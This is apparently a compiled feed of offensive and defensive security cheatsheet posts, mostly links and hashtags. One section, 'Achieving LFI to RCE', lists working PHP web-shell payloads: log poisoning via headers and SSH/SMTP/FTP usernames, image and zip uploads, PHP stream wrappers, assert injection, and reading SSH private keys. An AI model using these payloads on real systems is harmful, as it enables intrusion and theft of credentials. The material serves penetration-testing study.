Windows Command-Line Obfuscation

Many Windows applications have multiple ways in which the same command line can be expressed, usually for compatibility or ease-of-use reasons. As a result, command-line arguments are implemented inconsistently making detecting specific commands harder due to the number of variations. This post shows how more than 40 often-used, built-in Windows applications are vulnerable to forms of command-line obfuscation, and presents a tool for analysing other executables.

# https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation

#cheatsheet #cmd #pentest

OFFENSIVE SECURITY CHEATSHEET

— Open Source Intelligence (OSINT)
— Web Pentest
— Network
— Shells methods
— Windows Systems
— Linux Systems
— Other Systems
— Passcracking Hash & Files
— Phishing, RedTeam and SE
— Wireless
— Cryptography
— Pwn
— External Resources

https://cheatsheet.haax.fr/

#cheatsheet #pentest #osint #ad

The Red Team Vade Mecum

https://kwcsec.gitbook.io/the-red-team-handbook/

#redteam #cheatsheet

Active Directory Penetration Testing Cheatsheet

https://infosecwriteups.com/active-directory-penetration-testing-cheatsheet-5f45aa5b44ff

#AD #pentest #cheatsheet

Blue Team Notes

A collection of one-liners, small scripts, and some useful tips for blue team work.

https://github.com/Purp1eW0lf/Blue-Team-Notes

#blueteam #cheatsheet

Sed Cheat Sheet

Useful sed scripts & patterns.

https://github.com/adrianscheff/useful-sed

#sed #cheatsheet #bash

Git Cheat Sheet

#git #cheatsheet

Windows Privileges

https://speakerdeck.com/fr0gger/windows-privileges

#windows #privileges #cheatsheet

Achieving LFI to RCE

1. Apache Log Poisoning

GET /show.php?file=/var/log/apache2/access.log&c=ls HTTP/1.1
User-Agent: <?php system($_GET['c'])?>

2. SSH Log Poisoning

ssh '<?php system($_GET['c'])?>'@target.com
/show.php?file=/var/log/auth.log&c=ls

3. SMTP Log Poisoning

telnet target(.)com 25
MAIL FROM:<test@example.com>
RCPT TO:<?php system($_GET['c'])?>
/show.php?file=/var/log/mail.log&c=ls

4. Image Upload

exiftool -Comment="<?php echo 'Command:'; if($_POST){system($_POST['cmd']);} __halt_compiler();" img.jpg
/show.php?file=../img.jpg&c=ls

5. /proc/self/environ

GET /show.php?file=../../proc/self/environ&c=ls HTTP/1.1
User-Agent: <?php system($_GET['c'])?>

6. php://filter

Read source code, it may contain sensitive data (username/passwords, private keys etc)->RCE
php://filter/convert.base64-encode/resource=index.php
php://filter/read=string.rot13/resource=index.php

"php://filter" is case insensitive. Try URL/Double encoding

7. Zip upload

echo "<?php system($_GET['c'])?>" > shell.php
zip shell(.)zip shell.php
mv shell(.)zip shell.jpg
rm shell.php

/show.php?file=zip://shell.jpg%23shell.php

8. data://text/plain

/show.php?file=data://text/plain,<?php echo base64_encode(file_get_contents("index.php"))?>
/show.php?file=data://text/plain,<?php phpinfo()?>
/show.php?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjJ10pO2VjaG8gJ3NoZWxsISc7Pz4=

9. /proc/self/fd/{id}

Include shell in headers (User-Agent, Authorisation, Referrer etc) and access /proc/self/fd/{id}

10. expect://

/show.php?page=expect://ls

11. input://

POST /index.php?page=php://input HTTP/1.1
<?php system('ls')?>

12. RCE via vulnerable assert statement

Vulnerable Code: assert("strpos('$file', '..') === false") or die("Hacker!");
Payload: ' and die(system("whoami")) or '

13. Log files

/var/log/apache/{access.log or error.log}
/var/log/apache2/error.log
/usr/local/{apache or apache2}/log/error_log
/var/log/nginx/{access.log or error.log}
/var/log/httpd/error_log

Insert payload via headers (User-Agent, Authorisation, Referrer etc)

14. Via PHP sessions

https://www.rcesecurity.com/2017/08/from-lfi-to-rce-via-php-sessions/

15. Via SSH

If ssh is active check which user is being used (/proc/self/status & /etc/passwd) and try to access <HOME>/.ssh/id_rsa

16. vsftpd Log Poisoning

Try to login (ftp) with the PHP payload in the username and access /var/log/vsftpd.log

17. Automation

https://github.com/D35m0nd142/LFISuite

#lfi #rce #cheatsheet

Bug Bounty Tip — Log4j Vulnerability Cheatsheet

— How It Works
— Test Environments
— Challenges & Labs (Rooms)
— Where Payloads can be Injected
— What Information can be Extracted
— How To Identify (Services & Scanners)

#log4j #cheatsheet #bugbounty

Active Directory Checklist — Attack & Defense Cheatsheet

https://cybersecuritynews.com/active-directory-checklist/

#ad #cheatsheet #redteam #blueteam

Container Security Checklist

Checklist for container security devsecops practices

https://github.com/krol3/container-security-checklist

#kubernetes #docker #security #cheatsheet #blueteam

Hashcat Cheat Sheet

https://www.blackhillsinfosec.com/wp-content/uploads/2020/09/HashcatCheatSheet.v2018.1b.pdf

#hashcat #cheatsheet

SharpHound Cheat Sheet

https://github.com/SadProcessor/HandsOnBloodHound/blob/master/BH21/BH4_SharpHound_Cheat_Dark.pdf

#sharphound #bloodhound #cheatsheet

📜 ADCS Attack Techniques Cheatsheet

This is a handy table outlining the various methods of attack against Active Directory Certificate Services (ADCS)

🔗 Source:
https://docs.google.com/spreadsheets/d/1E5SDC5cwXWz36rPP_TXhhAvTvqz2RGnMYXieu4ZHx64/edit?gid=0#gid=0

#ad #adcs #esc #cheatsheet